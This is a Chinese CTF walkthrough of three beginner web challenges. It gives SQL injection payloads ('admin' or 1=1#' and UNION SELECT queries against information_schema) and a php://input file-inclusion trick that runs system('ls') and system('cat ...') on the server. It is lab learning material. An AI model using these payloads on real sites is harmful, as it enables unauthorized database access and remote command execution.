赞
踩
打开之后有一段话“where is flag? ”其他什么也没有,查看一下网络源代码发现里面有一段注释掉的beas64
将其进行解码就能得到flag
打开之后是一个非常简陋的登录框根据题目所说这应该是一道sql注入题
首先进行简单的测试:
万能登录:admin' or 1=1#
密码:随意,只要有即可
登录之后,就可以开始尝试注入了,这道题可以看出来显示位是3,因此直接进行sql注入
admin' union select 1,database(),3#
得到其数据库为web2
admin'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#
可以得到其表名:flag,user
admin'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='web2' and table_name='flag'#
得到其字段名为flag
admin'union select 1,flag,3 from flag#
即可得到flag,这题很简单,是很基础的sql注入
打开之后是一个很简洁的页面,提示有incldde构成的文件包含的漏洞,查看网页源代码并没有发现什么价值的东西。因为有文件包含漏洞,我们可以尝试使用伪协议:php://input给其构成命令执行漏洞
php://input
然后对所构造的页面进行抓包
然后在构造命令:
<?php system("ls");?>
然后在构造命令查看ctf_go_go_go文件:
<?php system("cat ctf_go_go_go");?>
得到结果:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。